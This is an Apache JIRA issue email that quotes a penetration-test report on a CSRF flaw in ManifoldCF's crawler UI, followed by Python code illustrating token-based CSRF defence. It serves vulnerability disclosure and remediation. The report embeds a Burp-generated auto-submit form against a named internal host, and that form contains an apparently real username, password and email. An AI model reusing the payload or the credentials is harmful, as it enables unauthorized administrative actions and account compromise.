[ 
https://issues.apache.org/jira/browse/CONNECTORS-1595?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16803842#comment-16803842
 ] 

Karl Wright commented on CONNECTORS-1595:
-----------------------------------------

[~goovaertsr] I am going to assign these to the fellow who wrote the current UI 
and see what he says.  I expect some things would be easier to address than 
others.


> cross-site request forgery vulnerability
> ----------------------------------------
>
>                 Key: CONNECTORS-1595
>                 URL: https://issues.apache.org/jira/browse/CONNECTORS-1595
>             Project: ManifoldCF
>          Issue Type: Improvement
>          Components: API
>    Affects Versions: ManifoldCF 2.12
>            Reporter: roel goovaerts
>            Priority: Minor
>
> Below is the full analysis and description as a result from the penetration 
> test.
> *Summary*
> The application is vulnerable to Cross-Site Request Forgery (CSRF).
> A cross-site request forgery attack uses the following scenario:
> 1. An attacker creates a web page that includes an image or a form pointing 
> to the attacked application.
> The image source would actually be a URL with parameters pointing to the 
> application page that
> performs some action. In case of a form, the form action would point to the 
> action page in the target
> application, and the form is submitted automatically by JavaScript when the 
> page is viewed.
> 2. The attacker tricks the victim user to browse to this page. The attacker 
> may get the victim to click a
> link, or embed the attacking HTML code into some page the victim views, for 
> example in a bulletin
> board or chat.
> 3. When the victim views the attacker's page, his browser sends a request 
> prepared by the attacker to
> the attacked application. If the victim is logged in to the target 
> application, his browser will possess
> all necessary session tokens, so the request will appear as authorized to the 
> application and
> succeed.
> A cross-site request forgery attack uses the fact that the victim's browser 
> possesses the necessary
> authentication tokens to perform some actions in the target application.
> *Impact*
> A remote, unauthenticated attacker that can trick an authenticated user into 
> clicking a link crafted by the
> attacker or open a malicious web page, can force the victim to unknowingly 
> perform various actions within
> the application.
> Given that the whole application is not protected against CSRF, any action 
> that an administrator can take on
> Apache Manifold could be unknowingly performed if they fall for a CSRF attack.
> *Affected Systems*
>  * [https://els-manifold-uat.bc:8475/mcf-crawler-ui/]
> *Description*
> It appears that the application does not implement any CSRF protection. 
> Consider the following example. An
> attacker tricks a logged in application user to visit a page containing the 
> following code:
> {code:java}
> <html>
> <!-- CSRF PoC - generated by Burp Suite Professional -->
> <body>
> <script>history.pushState('', '', '/')</script>
> <form action="https://els-manifold-uat.bc:8475/mcf-crawler-ui/execute.jsp"
> method="POST" enctype="multipart/form-data">
> <input type="hidden" name="op" value="Save" />
> <input type="hidden" name="type" value="connection" />
> <input type="hidden" name="tabname" value="Name" />
> <input type="hidden" name="isnewconnection" value="false" />
> <input type="hidden" name="connname" value="clix&#45;fr" />
> <input type="hidden" name="description" value="" />
> <input type="hidden" name="classname"
> value="org&#46;apache&#46;manifoldcf&#46;crawler&#46;connectors&#46;webcrawler&#46;WebcrawlerConnector" />
> <input type="hidden" name="authorityname" value="&#95;none&#95;" />
> <input type="hidden" name="throttlecount" value="0" />
> <input type="hidden" name="maxconnections" value="10" />
> <input type="hidden" name="email" 
> value="ferdi&#46;klomp&#64;craftworkz&#46;nl" />
> <input type="hidden" name="robotsusage" value="none" />
> <input type="hidden" name="metarobotstagsusage" value="all" />
> <input type="hidden" name="regexp&#95;bandwidth&#95;0" value="" />
> <input type="hidden" name="insensitive&#95;bandwidth&#95;0" value="false" />
> <input type="hidden" name="connections&#95;bandwidth&#95;0" value="2" />
> <input type="hidden" name="rate&#95;bandwidth&#95;0" value="64" />
> <input type="hidden" name="fetches&#95;bandwidth&#95;0" value="12" />
> <input type="hidden" name="bandwidth&#95;count" value="1" />
> <input type="hidden" name="acredential&#95;count" value="0" />
> <input type="hidden" name="scredential&#95;0&#95;regexp"
> value="https&#58;&#47;&#47;intrauat&#46;web&#46;bc&#47;" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;regexp" value="login" 
> />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;type" value="form" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;matchregexp"
> value="validation" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;overridetargeturl" 
> value=""
> />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;op"
> value="Continue" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;param"
> value="username" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;value"
> value="id996812" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;password" 
> value="" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;op"
> value="Continue" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;param"
> value="password" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;value"
> value="Th1sIs4cl1X" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;password" 
> value="" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;op"
> value="Continue" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;param"
> value="login&#45;form&#45;type" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;value" 
> value="pwd" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;password" 
> value="" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;loginparamcount"
> value="3" />
> <input type="hidden" name="scredential&#95;0&#95;loginpagecount" value="1" />
> <input type="hidden" name="scredential&#95;count" value="1" />
> <input type="hidden" name="regexp&#95;trust&#95;0"
> value="https&#58;&#47;&#47;intrauat&#46;web&#46;bc" />
> <input type="hidden" name="trustall&#95;trust&#95;0" value="false" />
> <input type="hidden" name="trust&#95;count" value="1" />
> <input type="hidden" name="proxyhost" value="" />
> <input type="hidden" name="proxyport" value="" />
> <input type="hidden" name="proxyauthusername" value="" />
> <input type="hidden" name="proxyauthdomain" value="" />
> <input type="hidden" name="proxyauthpassword" value="" />
> <input type="hidden" name="client&#95;timezone&#95;offset" value="&#45;60" />
> <input type="hidden" name="client&#95;timezone" value="Europe&#47;Zurich" />
> <input type="submit" value="Submit request" />
> </form>
> </body>
> </html>
> {code}
> When the victim's browser parses the page and tries to load images, it will 
> cause them to execute any action
> of the attacker's choosing on Manifold.
> *Recommendations*
> The usual approach to preventing CSRF attacks is to add a new parameter with 
> an unpredictable value to
> each form or link that performs some action in the application, commonly 
> referred to as a CSRF-Token. The
> parameter value should have enough entropy so that it cannot be predicted by 
> an attacker and should be
> unique to the current user session. When the user submits the form or clicks 
> the link, the server side code
> checks the parameter value. If it is valid, the request is accepted, 
> otherwise it is denied. The attacker has no
> way of knowing the value of the unpredictable parameter, so he cannot 
> construct a form or link that will
> submit a valid request.
> *References*
>  * OWASP - Cross-Site Request Forgery - 
> [https://www.owasp.org/index.php/Cross-Site_Request_Forgery]
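The synchronizer-token recommendation in the quoted report, modelled as a stand-alone example. This is added illustration code, not ManifoldCF's own implementation: the field name `csrf_token`, the `Session` stand-in, and `handle_execute` (a model of a state-changing endpoint such as execute.jsp) are all assumptions. It shows the three parts the report asks for: a high-entropy token bound to the user's session, the token embedded in every action form, and server-side validation that rejects a request lacking the right token, which is exactly what a cross-site form like the one above would be missing.

```python
"""Synchronizer-token CSRF protection: per-session token, embedded in
forms, checked on every state-changing request (added example)."""
import hmac
import html
import secrets

TOKEN_FIELD = "csrf_token"  # hypothetical hidden-field name


class Session:
    """Minimal stand-in for a server-side HTTP session store."""

    def __init__(self):
        self.data = {}


def issue_csrf_token(session):
    """Return the session's CSRF token, creating it on first use.

    256 bits from the OS CSPRNG: unpredictable to an attacker and
    unique to this session, which is what the recommendation requires.
    """
    token = session.data.get(TOKEN_FIELD)
    if token is None:
        token = secrets.token_urlsafe(32)
        session.data[TOKEN_FIELD] = token
    return token


def render_form(session, action, fields):
    """Render a POST form with the session token as a hidden field.

    Every form that performs an action must carry the token; values are
    HTML-escaped so the token or field data cannot break out of attributes.
    """
    hidden = "".join(
        f'<input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}" />'
        for k, v in fields.items()
    )
    token_field = (
        f'<input type="hidden" name="{TOKEN_FIELD}" '
        f'value="{html.escape(issue_csrf_token(session))}" />'
    )
    return f'<form action="{html.escape(action)}" method="POST">{token_field}{hidden}</form>'


def validate_csrf(session, form):
    """True only if the submitted token equals the session's token.

    A missing token, a session that never issued one, or a token from a
    different session all fail. Comparison is constant-time.
    """
    expected = session.data.get(TOKEN_FIELD)
    supplied = form.get(TOKEN_FIELD)
    if not isinstance(expected, str) or not isinstance(supplied, str):
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def handle_execute(session, form):
    """Model of a state-changing endpoint (hypothetical execute.jsp stand-in).

    The CSRF check runs before any action; a forged cross-site POST is
    refused with 403 regardless of the victim's authenticated session.
    """
    if not validate_csrf(session, form):
        return (403, "CSRF token missing or invalid")
    return (200, f"performed {form.get('op')} on {form.get('type')}")


if __name__ == "__main__":
    victim = Session()
    # Constructed request shaped like the report's PoC: no token field.
    forged = {"op": "Save", "type": "connection", "connname": "clix-fr"}
    print(handle_execute(victim, forged))        # (403, ...)
    legit = dict(forged, **{TOKEN_FIELD: issue_csrf_token(victim)})
    print(handle_execute(victim, legit))         # (200, ...)
    print(render_form(victim, "/mcf-crawler-ui/execute.jsp", {"op": "Save"}))
```

Because the token lives only in the victim's session and in pages the server rendered for that session, a page on the attacker's origin cannot read it, so the hidden-field form from the report is rejected before `execute.jsp`-style logic runs.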



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)